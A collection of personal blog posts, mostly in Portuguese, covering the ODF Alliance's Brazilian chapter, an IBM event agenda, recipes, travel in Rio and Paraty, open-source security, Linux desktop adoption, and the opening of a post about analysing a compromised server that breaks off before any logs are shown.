Foi anunciada ontem para a mídia a ODF Alliance – Chapter Brasil. Somos o terceiro país no mundo que criou esta iniciativa, depois da Polônia e da Índia.

Tem como membros fundadores as sucursais brasileiras da IBM, Red Hat, Sun e Jomar Silva como diretor, que me contou o seguinte:

Eu entendo que a operação brasileira tem como missão e papel realizar o trabalho proposto pela ODF Alliance em território brasileiro. Somos todos parceiros e lutamos juntos a mesma batalha, trocando experiências (e este é um ponto muito importante) para que as lições aprendidas com a migração e adoção do ODF por outros países (governos e empresas) possam ser utilizadas aqui.

Diversos softwares já oferecem hoje suporte de leitura e escrita de arquivos no formato OpenDocument, sendo o mais conhecido a universal suite OpenOffice.org. O usuário então ganha com isso liberdade de escolha, poder de negociação, e poder optar pela melhor relação custo-benefício. Essa dinâmica usuário-fabricantes funciona como combustível para a inovação.

ODF é um patrimônio de seus usuários e da humanidade. Baseado em padrões abertos como XML, somado aos fatos de ter uma licensa de uso livre, e de já ser um padrão ISO (dois passos à frente do OOXML, concorrente proprietário da Microsoft), assinala um marco na história da TI onde pela primeira vez o usuário é verdadeiramente dono independente de seus próprios dados, garantindo assim sua longevidade e interoperabilidade. É simplesmente uma idéia muito poderosa.

O ODF Alliance – Chapter Brasil tratará, em seus primeiros dias de vida, de levantar seu site em português — provavelmente em www.br.odfalliance.org —, e em definir critérios para receber novos membros, como empresas, instituições, grupos de usuários e comunidades.

Inclusão Digital

Já posso desencarnar feliz porque tenho um blog popular.

Meu post sobre Aquecimento Global é o campeão de audiência com 246 comentários neste exato momento, mas se você for verificar agora, o número já deve ter crescido. Até o final do ano deve facilmente chegar a 400 comentários.

Escrito numa noite mal dormida, de pesadelos, após ter assistido o filme do Al Gore, nunca tinha imaginado que seria tão visitado, e nem por esse tipo de público: a maioria são estudantes fazendo trabalho para a escola.

Uma conhecida que corrige redações de vestibular me disse uma vez que o nível dos textos é muito baixo. Confesso que achei que ela estava exagerando e sendo pessimista demais, mas minha opinião mudou depois do meu post popular.

Veja alguns comentários ali:

E a lista não pára…

A inclusão digital está acontecendo mais rápido do que qualquer outra inclusão.

Aproveitando, meus outros posts populares são o de download de música, o do Google Maps para WordPress, e o do tema do meu blog.

IBM no Oracle Open World

A IBM vai participar do evento Oracle Open World, nos dias próximos dias 27, 28 e 29 de março.

Local

Transamérica Expo Center, São Paulo.

Agenda

Parceiros, Cezar Taurion, outros especialistas da IBM e também eu, vamos mostrar casos de sucesso e novas idéias sobre diversos assuntos, inclusive Linux, Service Oriented Architecture, Padrões Abertos, Software as a Service, novidades nas plataformas de hardware da IBM etc. Confira a agenda:

Dia 27/03

11h00 – 11h40 System p (Unix) para Soluções Oracle

Conheça a tecnologia POWER IBM, com todo poder de processamento e capacidades avançadas de virtualização e alocação dinâmica de recursos. Ideal para empresas com missão crítica e com necessidades de flexibilização da sua área de TI, além de ser uma combinação perfeita com diversas soluções Oracle.

Palestrante: Mauro Minomizaki

11h45 – 12h15 Caso de sucesso – Unilever: Buscando a excelência através da implementação de ITIL

Com a implementação dos processos ITIL suportados pelo Siebel, a área de IT da Unilever Latin America busca consolidar sua excelência operacional para entregar aos seus clientes um serviço cada vez melhor.

Palestrante: José Ferroli (Unilever)

14h00 – 14h40 Modelos de negócio para padrões abertos e open source

A importância dos Padrões Abertos para a indústria e sociedade. Como empresas estão tirando vantagem disso. Modelos de negócios para Open Source, e como escolher entre Open Source e Closed Source.

Palestrante: Cesar Taurion (IBM)

14h50 – 15h20 Software como Serviço: rompendo os limites do modelo de aplicativos sob demanda

Conheça esta forte tendência do mercado, o modelo de software como serviços. Uma forma lexível de compra de soluções que consiste na entrega das funcionalidades de uma aplicação com o pagamento baseado em sua utilização.

Palestrante: Marcos Prete (IBM)

15h30 – 16h00 Parceiro: MPL

Soluções para empresas em que a performance dos projetos e gerenciamento dos riscos são críticos. Controle os custos de seus projetos em tempo real.

Palestrante: MPL

16h10 – 16h40 Soluções financeiras para viabilizar seu projeto

O Banco IBM apresenta uma série de alternativas para viabilizar seu projeto de TI. Conheça as melhores e mais variadas soluções financeiras para levar seu projeto adiante.

Palestrante: André Sales (IBM); Antonio Ramos (IBM)

16h40 – 17h20 IBM Service Management for Oracle Applications – Oracle Optimization and Management

O IBM Service Management alavanca as práticas ITIL para reduzir tempo, custo e risco na entrega e gerenciamento de aplicações Oracle em ambientes heterogêneos, ajudando as empresas a reduzir o custo total de suas operações e a liberar os orçamentos para investimentos em inovação.

Palestrante: Jorge Cordenonsi

17h20 – 18h00 Por que Oracle no mainframe?

A Oracle e a IBM anunciaram em Outubro de 2006 uma forte parceria de aplicativos e Banco de Dados em plataforma mainframe – System z. Além disso, algumas dessas tecnologias já estão rodando em ambiente Linux do mainframe, com um ótimo TCO para clientes que buscam consolidação.

Palestrante: Roberto Santos (IBM)

18h00 – 19h00 Coquetel System z

Dia 28/03

11h00 – 11h40 Soluções Mid-Range de Storage para Oracle

Conheça as soluções voltadas ao mercado de pequenas e médias empresas, onde o volume de dados vem crescendo a cada dia. Além disso, veja os diferenciais com soluções Oracle e os últimos lançamentos voltados para esse mercado.

Palestrante: Wellington Menegasso

14h00 – 14h40 Sizing de Infraestrutura para Soluções Oracle

Veja como a IBM investe fortemente em seu Centro de Competência, bem como na ferramenta de sizing, garantindo o bom funcionamento do seu processo e trazendo economia às empresas, além de ser uma ótima oportunidade aos nossos parceiros de negócios.

Palestrante: Guilherme Araujo (IBM)

14h50 – 15h20 Software como Serviço: rompendo os limites do modelo de aplicativos sob demanda

Conheça esta forte tendência do mercado, o modelo de software como serviços. Uma forma flexível de compra de soluções que consiste na entrega das funcionalidades de uma aplicação com o pagamento baseado em sua utilização.

Palestrante: Marcos Prete (IBM)

15h30 – 16h00 Parceiro: HB Global

Soluções JD Edwards Oracle para Transporte e Logísitica

Palestrante: HB Global

16h00 – 16h30 Soluções financeiras para viabilizar seu projeto

O Banco IBM apresenta uma série de alternativas para viabilizar seu projeto de TI. Conheça as melhores e mais variadas soluções financeiras para levar seu projeto adiante.

Palestrante: André Sales (IBM); Antonio Ramos (IBM)

16h30 – 17h10 Soluções Siebel com plataforma Unix IBM

Conheça as funcionalidades de nossa plataforma System p (UNIX) com o aplicativo Siebel Oracle, mostrando todo o valor agregado e benefícios que as empresas podem ter optando por essa solução.

Palestrante: Eduardo Pacini (IBM) e Sérgio Saldanha (Oracle)

17h20 – 18h00 Power Net – um programa direcionado para ISVs

PowerNet é um programa voltado a desenvolvimento de novos ISVs na plataforma System p. Venha conhecer todos os benefícios do programa e como a IBM está trabalhando com a Oracle. Extremamente focado para parceiros de negócios.

Palestrante: Marcelo Violento (IBM) e Sérgio Saldanha (Oracle)

18h00 – 19h00 Coquetel System p

Dia 29/03

11h00 – 11h40 Bladecenter com Soluções Oracle

Cada vez mais as empresas enfrentam problemas como redução de custos na área de TI, falta de espaço, problemas de refrigeração do seu CPD e gerenciamento de parques de servidores. O BladeCenter IBM pode resolver todos esses problemas com sua capacidade de

Palestrante: Ana Paula Tran

11h45 – 12h15 Caso de sucesso: Como atingir a otimização de processos com redução de custos e redução do número de transações de documentos em até 50%.

Melhoria do gerenciamento de risco, redução das complicações relacionadas a impostos e legais, melhoria da qualidade dos dados, maior cooperação dos empregados, otimização das ações da corporação, com maior rapidez nas soluções de possíveis dificuldades a

Palestrante: CVRD

14h00 – 14h40 A melhor distribuição Linux

Entenda o que são distribuições Linux, como estão posicionadas no mercado e na comunidade, as mais importantes, vantagens e desvantagens de cada uma, e como escolher a melhor para o seu negócio.

Palestrante: Avi Alkalay (IBM)

14h50 – 15h30 System i e JD Edwards: a combinação perfeita

Conheça a plataforma ideal para a solução de JD Edwards, o System i, dotado de tecnologia POWER. Possui alto poder de processamento, capacidades avançadas de virtualização e alocação dinâmica de recursos, além de ser uma máquina totalmente auto gerenciáve

Palestrante: Mauricio Conceição (IBM)

15h40 – 16h20 Otimize seu datacenter tirando o máximo de seu hardware

Conheça arquiteturas não-convencionais, mas que trazem benefícios financeiros enormes, para
virtualização, enjaulamento de aplicações, desktops multiusuários, clusters de alta disponibilidade, de custo baixo até os mais escaláveis, clusters para Grid e alta disponibilidade, e opções para desktop.

Palestrante: Avi Alkalay (IBM)

16h30 – 17h00 Parceiro: YKP

Conheças as Soluções CRM integradas ao JD Edwards

Palestrante: YKP

17h10 – 17h40 Soluções financeiras para viabilizar seu projeto

O Banco IBM apresenta uma série de alternativas para viabilizar seu projeto de TI. Conheça as melhores e mais variadas soluções financeiras para levar seu projeto adiante.

Palestrante: André Sales (IBM); Antonio Ramos (IBM)

Estando no evento, não deixe de passar no stand da IBM.

Receita de Sopa Fria de Pepino com Iogurte

Ingredientes

  • Pepinos compridos: 3
  • Copos de iogurtes: 2
  • Nozes picadas ou xerém de castanha de cajú: 150g
  • Dil (também conhecido por endro) picado: 2 colheres de sopa cheias
  • Alho amassado: 1 dente grande
  • Sal a gosto

Modo de Preparo

  1. Descasque e pique os pepinos em pedaços pequenos
  2. Junte os 2 copos de iogurte e mais 2 copos iguais de água
  3. Junte o alho amassado, a castanha de cajú ou nozes, e o dil
  4. Misture tudo e vá temperando com sal a gosto
  5. Deixe gelar na geladeira por meia hora

Serve 2 pessoas, em cumbuca e com colher de sopa. É leve, saudável e saboroso e as vezes só janto isso e fico satisfeito.

Algumas pessoas gostam de moer pimenta do reino sobre sua cumbuca, outras preferem regar um fio de azeite de oliva.

De qualquer forma, a impressão que se tem é que pepino, iogurte e alho nasceram para serem comidos juntos, de tanto que combinam.

Abraço dos Dois Irmãos

Sol atrás dos Dois IrmãosDescolei umas horas livres no fim da tarde, na praia de Ipanema.

Mergulhei perto do posto 8, no Arpoador. O mar estava pouco agitado mas muito gelado. Brrrrr: águas oceânicas.

O horário de verão terminou final de semana passado, então acho que estamos no outono. Nesta época o sol se põe exatamente atrás do Morro Dois Irmãos, que marca o fim do Leblon e o começo do Vidigal.

Conforme o sol ia baixando, formava dois enormes braços de raios com a sombra do morro no miolo. O efeito era os Dois Irmãos abraçando a cidade. Muito bonito e inspirador. E pelo jeito a cena já serviu de inspiração para outras pessoas.

Centro do mapa
no mapa
Morro Dois Irmãos
no mapa
Posto 8
no mapa
Arpoador

Enquanto assitia aquilo, parado, de pé no calçadão, pessoas passavam por mim. Um rapaz com camisa verde-amarela, andando de costas para o morro, tascou o último naco de seu espetinho-de-gato, e, exatamente em frente a um cesto de lixo grande, laranja e chamativo, lançou o espeto vazio ao ar. O espeto caiu na areia, e o papel que o envolvia foi para a calçada. Ele fez questão de não mirar no cesto !

O que faz um ser humano ter tal atitude? Ô povinho! Acabou com minha contemplação…

Mesmo assim o Rio de Janeiro continua lindo.

Nostalgia Titânica

Sabe, as vezes bate uma saudade dos velhos amigos. De épocas bem vividas. Não que os dias de hoje não sejam, mas em outros carnavais nossa mente estava em outra sintonia, que nos fazia levar a vida por caminhos diferentes.

Fico muito feliz quando conheço artistas e suas músicas que tocam minha alma diferente da média que a gente vai ouvindo por aí. Isso acontece poucas vezes por ano. E certos anos simplesmente não acontece.

Titane é uma cantora praticamente desconhecida que me levou para esse mundo da nostalgia. A saudade dos amigos que a gente pouco vê bate mais forte, ao mesmo tempo que rola uma esperança de estarmos mais próximos muito em breve.

Descobri suas músicas por aí, fui conhecendo mais e me encantei. Ela tem trabalhos que são deslumbrantes do começo ao fim. E que voz !

Zensider, de Edvaldo Santana e Ademir Assunção, era tocada às vezes na Rádio USP aqui em São Paulo, mas a Moda do Fim do Mundo, de Alice Ruiz e Chico César, do mesmo album mas jamais ouvida, é prá lá de mais interessante e melódica.

Curtam seus amigos. Agora, antes do fim do mundo.

Idealismo e Evolução

O idealismo está entre as coisas que mais faz o mundo andar para frente, e ao mesmo tempo, posiciona-se como a que mais segura a sua evolução.

O idealismo de mente aberta leva o mundo para frente. E o idealismo hermético, enclausurado, sem visão, fundamentalista, freia a evolução do mundo e da sociedade.

De qualquer forma, o idealismo como característica de personalidade, sempre vem empacotado com outras características, tais como falta de praticidade, um “não consigo terminar o que comecei”, e um altruismo que muitas vezes leva a irredutibilidade e, inevitavelmente, ao fundamentalismo.

Mas a visão mais ampla dos idealistas geralmente serve para inspirar pessoas de mente mais prática, menos cerebral, mais emocional, que pensa menos e faz mais, que enfim impulsionam a roda da história.

O progresso se faz com a mistura de personalidades idealistas (e teóricas) com as de tendência prática. Raros os líderes que tem ambas as características.

Os idealistas que enxergam 1000km no futuro e observam, durante a sua vida, a humanidade caminhar somente uns 2km para frente, devem se dar por satisfeitos. Esses 2km são exatamente o que a humanidade como um todo, hoje, é capaz de caminhar.

A evolução social, moral e benéfica não acontece a passos largos. Aos olhos dos impacientes parece até não acontecer. Mas na verdade nunca para e nunca anda para trás.

A Paradise on Earth

Last weekend we traveled to the Paraty bay area, a place that I visit since I was a kid. But this time was very special because I knew a new paradise: Saco do Mamanguá.

They say there is only one fjord in Brazil, which is the Saco do Mamanguá. To get there we traveled by car to Paraty Mirim, then took any traineira (a small and slow fisherman’s boat) that was siting on the beach waiting for tourists. You don’t have to setup an appointment or pay in advance. Just go. They use to charge R$35 per hour, for any number of persons up to about 10. We did everything in 4 wonderful hours.

Mamanguá is an 8km-long arm of the Atlantic ocean, far enough from Paraty to look as an almost untouched paradise. It has small clear water, isolated beaches, perfects for snorkeling, or simply for relaxing. In addition we were blessed by a beautiful shiny day, thats why I can’t avoid using the “paradise” word all the time.

The whole region deserves a visit, and thats why I’m writing this in english, to inspire non-brazilian folks come visit my beautiful country. But instead of a stream of words I invite you to explore the interactive map below. Click on the markers () to see more information and local photos.

Center of map
map
Saco do Mamanguá
Saco do Mamanguá
map
Paraty Mirim. A small and old village 18km far from Paraty. This is where we met Nelson and his “traineira” to take us to Saco do Mamanguá.
map
A typical building in Paraty
A typical building in Paraty
map
Le GiteFazenda Graúna. Go to Le Gite D’Indaiatiba, a beautiful pousada and restaurant by Olivier and Valerie. This restaurant is very expensive (about R$150 for two, no wine), but very good too. This place is in higher altitudes so in clear sky days you can have lunch contemplating the wonderful ocean down there.
map
TrindadeTrindade and Laranjeiras. Trindade was a small fishermen’s village that turned to be a place that many hippies go nowadays. Larangeiras is a village of very expensive and big cotages.
map
Ilha do Algodão.
map
Exit from main road (Rio-Santos, BR-101) to the road that takes to Paraty Mirim.
map
Fazenda São Roque. There is nothing here, not even a good beach, but this is where I use to stay when I go to this region. No hotels nor pousadas.
map
Thermonuclear power station of Angra dos Reis
Thermonuclear power station of Angra dos Reis.
map
TaritubaTarituba. Used to be a small village and beach where simple fishermen live and work. They still live there, but all their wives opened simple restaurants along the shore and around. Due to the excess of fishermen boats (called “traineiras” in portuguese) this beach is dirty and not apropriate for swiming. Nowadays you may find some nightlife in Tarituba on weekends or holydays.
map
Mambucaba. This is well organized village built for the engineers of the Angra Dos Reis’ thermonuclear power station. It has the most beautiful beach on the region, with clear waters. This place is almost outside the bay so you will find surfists riding the waves. This beach is always full of young people.
map
Ilha do BreuFazenda São Gonçalo. A private farm with a calm beach, good for children, easily accessible only from certain points. You’ll find places to park your car and walk for 3 minutes to the beach. If you want, you can pay R$7 per person to a fisherman and he’ll take you and your family to the Breu (the picture) or Pelado island, right in front of the beach. You will stay on clear water beaches with big stones full of aquatic wildlife. Bring your diving mask and snorkel. There is also a rustic restaurant there, where you can chill out having a caipirinha de maracujá (passion fruit caipirinha) or água de côco (coconut water) with fried fish. Don’t miss their mandioca frita (mandioca is something similar to a potato but only available in Brazil).
map
The Iriri waterfallsCachoeira do Iriri. Coming from Paraty to Rio, right before the São Gonçalo farm complex, there is an almost unaccessible beach that you will see from a hill on the road. A reference is a red and huge cellular antena. On the other side of the road there is a bus stop and a trail into the forest. A 3 minutes walk will take you to a beautiful clear water river with a natural pool and waterfalls. You will see a closed house but you are not transpassing. Just chill out there the whole afternoon after the beach. You can stay under the waterfall to heal your backs. If you feel adventurous, look for a jungle trail right on the side of the pool, going uphill. It will take you to the second floor of rocks, but there is nothing there. Keep on going up until you find the river again on the third floor. Look down and you will see your non-adventurous friends that stood on the first waterfall. Say hello and goodby, because we are not finished. Walk by the river for 3 minutes until you see a huge natural water pool with another waterfall. You’ll be probably alone there. This is a window to paradise. Just don’t miss this point.

Other things to do

  • Walk around in old Paraty area and remember that you are visiting one of the eldest places in Brazil. Enjoy the rich nightlife with live music. The city is always packed by tourists from all parts of the world.
  • Have a light vegetarian meal in the Ganges, close to the famous Pousada do Sandi. Or choose one from the tons of restaurants around. In Paraty you should have seafood.
  • Have an icecream in a place called Sorveterapia. The owner is a sort of researcher in the art of icecream making, and has developed a very light and natural formula to produce it. Very unexpensive too.
  • Going north on the BR-101 road (also known as Rio-Santos) you will find many beaches. The most important ones are marked on the map. Ask also about the big number of waterfalls. Some of them you can see from the road, coming down the mountains big and white. My preferd is Cachoeira do Iriri, hidden but marked on the map.
  • Going south thowards Ubatuba there are some famous beaches too, as Prumirim, Ubatumirim, Almada, Praia Vermelha, etc. But I don’t use to go there very much: the closer you get to Ubatuba, the crowder will be.
  • If you have an off-road car or jeep, leave Paraty to west, towards Cunha, through the old way. There are some more waterfalls on the go, nice handcraft shops, restaurants and amazing tropical landscapes. Cunha is known as home of excellent ceramicists, so look for their studios. Have a meal in the Restaurante Uruguayo.
  • You will see a lot of rain in all that region too, almost every day. This is a bless that you should contemplate quietly. The rain smells absolutely delicious over there.

Segurança em Open Source

Cezar Taurion, excelente consultor e colega de trabalho, engatou seu blog no developerWorks. Gostaria de complementar seu artigo da Linux Magazine de dezembro de 2006 com algumas aspectos sobre segurança.

Não há como afirmar que Open Source é mais seguro que Closed Source, ou que Closed Source é mais seguro que Open Source. Quem o afirma, geralmente faz por religião e não por análise fria.

Considero-me especialista em segurança, mas evito ao máximo tocar neste assunto ao falar com clientes em geral, quando o âmbito é Open Source. Só quando eles perguntam. Simplesmente porque cada um terá uma opinião, e porque nehuma opinião pode ser verdadeiramente constatada.

Vamos dividir o mundo Open Source em dois blocos. No primeiro desfilam as escolas do grupo 1, campeões de audiência como o Apache HTTP Server, Samba, boa parte do Kernel, Bind, OpenSSH, DHCP, Firefox, OpenOffice.org, libc, que são arrasadoramente populares, e literalmente seguram a festa da Internet no ar. A lista não é muito maior que essa.

E no grupo 2 ficam todos os outros projetos Open Source, disputando um lugar ao sol e na passarela das distribuições Linux. Aqui estão as dezenas de milhares de projetos abandonados do SourceForge.net, e também projetos longe da criticidade das do grupo 1, mas já um pouco mais usados, como Gnome, KDE, X.org, a outra parte do Kernel, OpenLDAP, NAS, VNC, ImageMagick, Bash, Gimp, Kopete, Gaim, libc++, libxml, ntp, e mais todo o resto que não aparece no grupo 1 mas que está instalado aí no seu computador.

Enquanto pensamos que no closed source podem haver pontos inacessivelmente inseguros e backdoors, devemos também nos perguntar se há realmente pessoas analisando todo Open Source que interessa, com enfoque em segurança. Pense no grupo 2.

Sobre segurança em Open Source, a única coisa que podemos afirmar é que o código se mantém aberto para quem quiser auditá-lo (característica que o closed source não tem e nem quer ter). Mas novamente, isso não é garantia de que suas falhas serão achadas.

No grupo 1, dos superpopulares, a estória é outra. Eles são naturalmente submetidos a stress massivo e constante do mundo real. E a dependência que muitas empresas e indivíduos tem desse grupo os leva a se relacionar de forma simbiótica com sua evolução. Usam o fato de ter o fonte disponível para auditar e contribuir melhorias.

A separação entre os grupos não é tão nítida. Usei só para ilustrar. A fronteira é na verdade uma larga faixa de projetos Open Source com diferentes graduações de popularidade, stress e uso.

É preciso ter a soma de dois aspectos para se ter a melhor segurança: código fonte aberto + extrema popularidade, sendo o último mais importante (e mais difícil de alcançar) que o primeiro.

Um closed source também tem sua chance de ser seguro. Basta a empresa que o fabrica cuidar bem de seu produto. Se ele for popular, ela tende a cobrar menos para executar este trabalho. Se for menos popular, mas ainda desejado pelos clientes, seu preço tende a ser mais alto.

O nabo é dos NETs

Complementando a estória do Antônio “LedStyle” Cláudio, eu tenho NET de 200kbps em Higienópolis. É tão bom quanto 200kpbs conseguem ser.

Mas quero aumentar a velocidade, e depoimentos como o dele dão medo. O pior de tudo é o atendimento péssimo das centrais dessas prestadoras. E o serviço é bem caro, mas vamos dizer que atribuo isso ao fato de que custo de banda core no Brasil é caríssimo.

Diga-se de passagem, meu pai colocou 2mbps em casa, com NET Fone. Ele fez uma análise meticulosa das tarifas de ligação telefônica comparando outras operadoras, e disse que o preço do minuto NET é bem mais caro. A NET diz que é mais barato. Bem, isso é uma meia verdade, somente em alguns horários, para ligações locais muito curtas. Como diz o ditado, uma meia verdade é uma mentira.

Antes eu tinha o Giro, da Vesper/Embratel. 300kbps de baixa qualidade que vinham através de um modem sem fio que usava a infraestrutura CDMA da Vesper, e era conectado por USB no computador, e tinha suporte ruim para Linux.

Por ironia do destino, o atendimento telefônico do Giro da Vesper era ótimo. Atendentes sinceros, com bom conhecimento técnico e que retornavam ligações depois de fazer análises bem feitas. Fiz questão de registrar isso quando infelizmente cancelei o serviço porque sua tecnologia não me atendia.

OSDL Linux Client Survey Analysis is Out

On January 25th the OSDL released their 2006 Linux client survey analysis, which identified the following barriers for Linux deployment on desktops:

  1. Application availability
  2. Quality of peripheral support
  3. End user training
  4. Desktop management issue

It is not that applications don’t exist for the Linux desktop, but users grow accustomed to certain applications that they just can’t live without.

Users report they are missing applications as Microsoft Office (OpenOffice.org is the alternative), Adobe Photoshop (which has The Gimp as the closest, but still far alternative), AutoCAD (with QCad as a very far similar) and others.

For peripherals, this is the list:

  1. Printers
  2. Personal storage devices (i.e. USB memory)
  3. Scanners
  4. Digital cameras
  5. Mail and messaging devices
  6. Web cam / video
  7. Smartphones

However, it is still difficult to buy a printer at your local electronics store and expect it to work out of the box on a Linux machine. While most printers are supported on Linux, there is still a lag from the time when a printer hits the market to when the driver driver is available and automatically installed on your computer by a commercial distro update.

And as a Linux user, I must add that when the device works, it usually won’t work with its full set of capabilities, because drivers are usually written by third parties on the OSS world – and not by their manufacturers, which are expected to have a much deeper knowledge (and project commitment) on these hardware capabilities.

So the problem is a committed application and drivers development. Well, how can companies commit themselves to develop desktop software (which means friendly to non-technicall users) in a world that had not decided yet about some elementary standards? Yes, there is the FreeDesktop.org initiative but the standards they are focused on are more related to KDE-Gnome interoperability.

Most important standards that must be defined will find their home in a layer bellow: LSB. But unfortunately, the Linux Standard Base still has a big job to finish and still seems to have difficulties to catch up with ISVs.

As an example, there is no de facto standard defined for things as trivial as a configuration files format for the whole system, not only for desktop apps. This is particularly important because configurations are what makes software run in a specific way. They are the soul of any software (while code is the body). A popular standard for configurations will provide ways for any software to collaborate with, and auto-configure any other software. On Windows, this was successfully achieved with its registry. On Linux, similar but broader and better alternatives exist (as the Elektra Initiative), but this is a subject that seems to not inspire the OSS community.

Standards bodies can’t do everything alone. The community must be ready for changes, adaptations, and have courage to throw away code that was not choosed by the standard, and start focusing on what was selected to be part of it. Courage to stop reinventing the wheel. For example, on a vanilla KDE installation you will find about 4 different media players (Amarok, Juk, kboodle, noatun, etc) and 3 different plain editors (kate, kedit, kwriter). If you have Gnome installed on same system, add a few more to each class of applications (and to the icons that will appear on your menus). This is confusing, fat and bad.

Another important fact on the analysis is a 49% desktop share for Canonical’s Ubuntu Linux, against RHEL and SLED with 16% each. RHEL and SuSE are more popular on servers and are essentially and structurally different distributions, but both use RPM as their packaging system. While Ubuntu is radically different from both, based on Debian, with the DEB format for packages. A well known and well used packaging system is very important on a desktop world, because this is what guarantees an easy, painless software installations and upgrades. So if I am an ISV with limited technicall staff and time resources, how should I package my software for easy deployment? DEB or RPM? If RPM, should I focus on Red Hat or SuSE flavors? Though questions.

Application vendors cannot afford to develop, distribute, and support applications across a fragmented Linux market.

Red Hat and Novell should look at their future server market, paying attention on what is happening today on the desktop. History shows that people tend to bring to work (and to servers) what they like and use on their desktops at home. This is Ubuntu’s long term strategy and they seem to be succeeding, at least on their first phase.

Ponto de Luz

Queda d'água na pousadaDias atrás tirei umas férias curtas e resolvi conhecer o legendário Ponto de Luz, pousada zen na Serra da Mantiqueira, quase divisa entre São Paulo e Minas.

A viagem foi fácil, pela Rodovia Fernão Dias. Depois, uma bela estrada até Joanópolis e depois uns 19km de estrada de terra até a pousada. Este último trecho tem belas paisagens rurais de colinas, pomares e criação de gado. Há bastente gente morando ao longo da estrada. Havia muitas bifurcações e encruzilhadas, sempre sinalizadas com o caminho a se tomar para chegar a pousada. Saí às 11:00 de São Paulo e cheguei umas 13:30, prontinho para almoçar.

A pousada é propositadamente rústica-chique, como tantas outras por alí, em São Francisco Xavier, Gonçalves, Monteiro Lobato, etc. Como a região é montanhosa, é também cheia de rios, e a propriedade era cortada pelo Ribeirão da Vergem Escura (afluente da bacia do Rio Piracicaba) cujas pedras formavam um grande poço que convidava para um banho. Nos dias em que estive lá, a água estava um pouco barrenta por causa das chuvas, mas em outras épocas o rio tem águas cristalinas. Há um belo caminho aberto até o rio, e perto da margem colocaram uns assentos que serviam para nada além da pura contemplação da natureza.

Centro do Mapa
no mapa
Hotel Ponto de Luz

(interaja com o mapa)

Rede na varanda do quartoA grande sacada do arquiteto foi construir a pousada na encosta do morro. Isso funcionava bem para dar vista alta, de qualquer ponto da pousada, para o outro lado do rio e para colinas verdejantes e arborizadas. Inclusive do refeitório e da varanda dos quartos com sua rede de balanço.

E falando nisso, a comida era bem simples mas muito gostosa, essencialmente vegetariana, às vezes com uma opção de frango ou peixe. Sempre havia sobremesas dietéticas. O serviço era ótimo, atencioso, e a inclinação exotérica da pousada parecia plantar uma consciência holística nos funcionários.

Só o preço foi na minha opinião um pouco além da conta. R$204 pela diária, incluindo as 3 refeições mais o lanche da tarde. Por pessoa. Estou acostumado a viajar pela região e sei que os preços não são bem esses. Mas calculei que no valor há uma boa lapa de moda de turismo exotérico. Aí fiquei surpreso que no final ainda me convidaram a pagar 10% de taxa de serviço opcional que é dividida entre os funcionários no final do mês. Argumentei que a pousada como um todo já era um serviço, e que não fazia sentido uma taxa de serviço sobre um serviço que por sinal já estava bem pago. Acabei sucumbindo porque continuar a discussão ia ser constrangedor para a situação. Terminou mal explicado.

Havia uma agenda de atividades diárias, com caminhada leve de manhã, algum tipo de hidroginástica antes do almoço e meditação no fim do dia, logo depois do lanche da tarde. Experimentei lá, pela primeira vez, a meditação dinâmica, especialmente desenhada para pessoas estressadas da cidade grande, como eu. Bem legal. Mas, como toda meditação, exige disciplina para se fazer todos os dias. No segundo dia meditamos num pequeno templo charmoso, construido a toque de caixa para a visita de um guru indiano.

TerapiasDepois da meditação dava um pulo na piscina aquecida onde ficava de molho até a noite. O clima não estava convidativo para a piscina aberta e fria. O resto do tempo passava na rede da varanda do quarto, lendo, ouvindo música e observando as colinas tranqüilamente. Ou dava uma olhada na lojinha anexa, cheia de coisas no melhor estilo “além-da-lenda” (a coleção de CDs para vender era ótima, e levei alguns títulos). Ou ainda pode-se fazer uma das terapias e massagens disponíveis em seu cardápio de serviços, cobrados a parte, claro. Nos finais de semana parece que há palestras e atividades musicais, mas infelizmente não pude ficar para ver.

O pessoal da pousada conta que há hóspedes que reclamam que não há “nada” para fazer lá, nem telefone, nem TV, e acabam fugindo de volta para sua cidade agitada.

Bem, eu não sofro desse mal e ficaria lá pelo tempo que fosse, porque o Ponto de Luz é um lugar de paz contemplativa.

Receita de Quiabo Atomatado

Quiabos

Ingredientes

  • ½ kilo de quiabo, de preferência os menores
  • 2 latas de tomates inteiros despelados
  • ½ cebola picada
  • Azeite extra virgem
  • 2 pitadas de páprica picante (opcional)
  • Adoçante ou açucar
  • Sal a gosto

Modo de Preparo

  1. Limpe os quiabos removendo com uma faca a parte externa escura da circunferência de sua cabeça, mas não remova a cabeça inteira. Lave e deixe escorrer.
  2. Pique um pouco os tomates mas deixe pedaços para contarem a história.
  3. Refogue a cebola em um pouco de azeite e acrescente o purê de tomate.
  4. Adicione o quiabo, cortando os maiores no meio já sobre a panela.
  5. Adicione sal a gosto, a páprica picante, e umas 10 gotas de adoçante ou o equivalente em açucar.
  6. Adicione 2 dedos de água e misture bem. Cozinhe em fogo baixo, com a panela tampada por 15 minutos.
  7. Destampe, continue mexendo com fogo baixo por mais uns 15 minutos, até o tomate reduzir (secar) ao ponto de não sobrar molho mas só pedaços molhados de tomate.

A páprica picante combina muito bem com o leve sabor adocicado fortalecido pelo tomate. E o quiabo…. ah, o quiabo….

Sirva frio ou quente.

Na Trilha do Invasor

Qualquer administrador de firewall pode observar em seus registros que uma máquina conectada à Internet não fica um minuto sequer, 24 horas por dia, livre de tentativas de invasão. Tem sempre alguém fazendo uma varredura, tentando algum tipo estranho de conexão, requisitando URLs inseguras aos servidores web, enfim, batendo na porta. Parece que as pessoas têm se protegido bem já que não lembro de ter ouvido histórias detalhadas sobre um ataque efetivamente acontecendo.

Tive a oportunidade de analisar um computador que foi invadido e vou relatar aqui as evidências que os crackers deixaram para trás, como as descobrimos, e o que lhes interessava naquela máquina. Vou usar nomes fictícios e mascarar alguns IPs para resguardar a privacidade de todos.

Vamos chamar os invasores de crackers, porque hackers somos todos nós que respiramos tecnologia, “fuçadores” (tradução da palavra hacker), exploradores, pessoas curiosas. Somos todos hackers porque usamos nossas mentes poderosas para resolver problemas, ganhar dinheiro licitamente, enfim, fazer o bem. Um cracker por outro lado, usa seu conhecimento para invadir, deteriorar, tirar vantagem, e dar trabalho aos hackers administradores de redes. Um cracker é um mau hacker, e um bom hacker pode impedir a ação de um cracker.

Os Rastros Deixados pelo Cracker

O servidor em questão era uma máquina de testes internos na empresa A, que em determinado momento foi deslocada para um novo teste conectada à Internet, sem uma reinstalação. Tudo começou quando, poucas semanas após estar conectada à Internet, uma empresa que chamaremos de B, enviou um e-mail para P (provedor do link físico para a máquina atacada) informando que detectou uma tentativa de ataque, e requisitou um retorno. P encaminhou o e-mail para A, e esse continha alguns logs com a prova da tentativa de invasão:

